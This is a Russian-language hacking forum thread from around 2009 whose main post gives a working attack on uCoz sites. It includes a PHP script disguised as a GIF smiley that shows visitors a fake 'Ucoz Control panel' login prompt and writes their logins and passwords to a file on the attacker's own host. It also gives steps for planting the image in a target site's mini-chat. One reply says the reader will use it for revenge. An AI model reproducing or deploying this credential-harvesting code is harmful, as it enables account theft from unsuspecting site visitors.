antibook.net6.ru

Объявление

БЕСПЛАТНАЯ!!!!!!Раздача номерков... Что бы получить номерок нужно 1)не меньше 10 сообщений 2)помочь чем-нибудь форуму Пока много номерков

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.

Вы здесь » antibook.net6.ru » ВАШИ статьи » Взлом сайта на UCOZ

Взлом сайта на UCOZ

Страница: 1

Сообщений 1 страница 3 из 3

1

  • Автор: R@dOn
  • Главный VIP Админ
  • R@dOn
  • Откуда: Екатеринбург
  • Зарегистрирован: 2008-12-25
  • Приглашений: 0
  • Сообщений: 300
  • Уважение: [+0/-0]
  • Позитив: [+3/-0]
  • Пол: Мужской
  • Провел на форуме:
    5 часов 45 минут
  • Последний визит:
    2009-03-29 17:14:54

Привет. Сегодня я расскажу один из способов взлома сайтов на юкозе. Настоящий хакер может найти достаточно много уязвимостей на таких сайтах и знает много способов их взлома. Я надеюсь что скоро тоже буду таким=).

Итак, начнем...
Для начала нажно зарегистировать хост с поддержкой php (например http://mysite.phphost.net) . После регистрации льем на фтп скрипт и ставим права на пустой .txt файл, например : passwords.txt (сюда будут присылаться пассы пользователей похаканного сайта), и на файл smile.gif. Также скачайте любой смайлик в расширении .gif (типа cool.gif).
Затем откройте блокнот, да простой блокнот и напишите следующее:

<?
header("Content-type: image/gif");
$image = imagecreatefromgif('cool.gif');
if(!$_COOKIE['LOGON'])
{
$login = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
if(strlen($pass) <= 4 || !$login)
{
  Header('HTTP/1.1 401 Unauthorized');
  Header('WWW-Authenticate: Basic realm="Ucoz Control panel"');
}
elseif($login)
{
setcookie('LOGON',md5($pass));
$f = fopen('passwords.txt', 'ab');
fwrite($f, $login." ||| ".$pass."\r\n");
fclose($f);
}
}
imagegif($image);
imagedestroy($image);
?>

Как только вы напишите всё - сохраните файл под названием smile, потом поменяйте расширение на gif.
Теперь выбирайте любой юкозовский сайт, например http://target.ucoz.ru/ слева юкозовских сайтов как обычно, у большинства есть мини-чат справа. Так вот - для начала зарегистируйтесь на сайте, потом в мини чате напишите логин, а в содержании сообщения напишите следующее:

http://mysite.phphost.net/smile.gif

И нажмите ОК. Если после этого в миничате вместо сообщения появился смайлик - значит радуйтесь, т.к. сайт - уязвимый. После этого у всех кто будет заходить на данную страницу, (в этом примере это http://target.ucoz.ru/) будет появлятся форма в которую нужно будет ввести логин и пароль. У вас при входе на сайт такая форма будет появлятся тоже. И все, введеные логины и пароли в эту форму будут отсылатся в пустой файл passwords.txt, который вы создали в самом начале и залили на фтп.

Удачи! Практикуйтесь. Только на некоторых сайтах эта уязвимость может и не пройти. Но стандрартно созданный юкозовский сайт без доп. своих настроек будет уязвим. Всем спасибо за просмотр, надеюсь статья вам поможет =)))

0

2

  • Автор: BoND
  • Житель
  • BoND
  • Зарегистрирован: 2009-09-05
  • Приглашений: 0
  • Сообщений: 1
  • Уважение: [+0/-0]
  • Позитив: [+0/-0]
  • Провел на форуме:
    3 минуты
  • Последний визит:
    2009-09-05 19:31:09

R@dOn
спасибр огромное)) а то меня там кое где предали!вот я и отомщю)))

0

3

  • Автор: Айдар
  • Житель
  • Зарегистрирован: 2009-09-15
  • Приглашений: 0
  • Сообщений: 1
  • Уважение: [+0/-0]
  • Позитив: [+0/-0]
  • Провел на форуме:
    2 минуты
  • Последний визит:
    2009-09-15 20:57:49

У меня что то не получается создать хост на сайт sasuke-anime.ucoz.ru!!!Помогиите пожалуйста,МЕНЯ ВЗЛОМАЛИ!!!АДМИН ПАНЕЛЬ ВЗЛОМАЛИ!!!

ПАМАГИТЕ    ПАМАГИТЕ    ПАМАГИТЕ!!!

0

Страница: 1

Вы здесь » antibook.net6.ru » ВАШИ статьи » Взлом сайта на UCOZ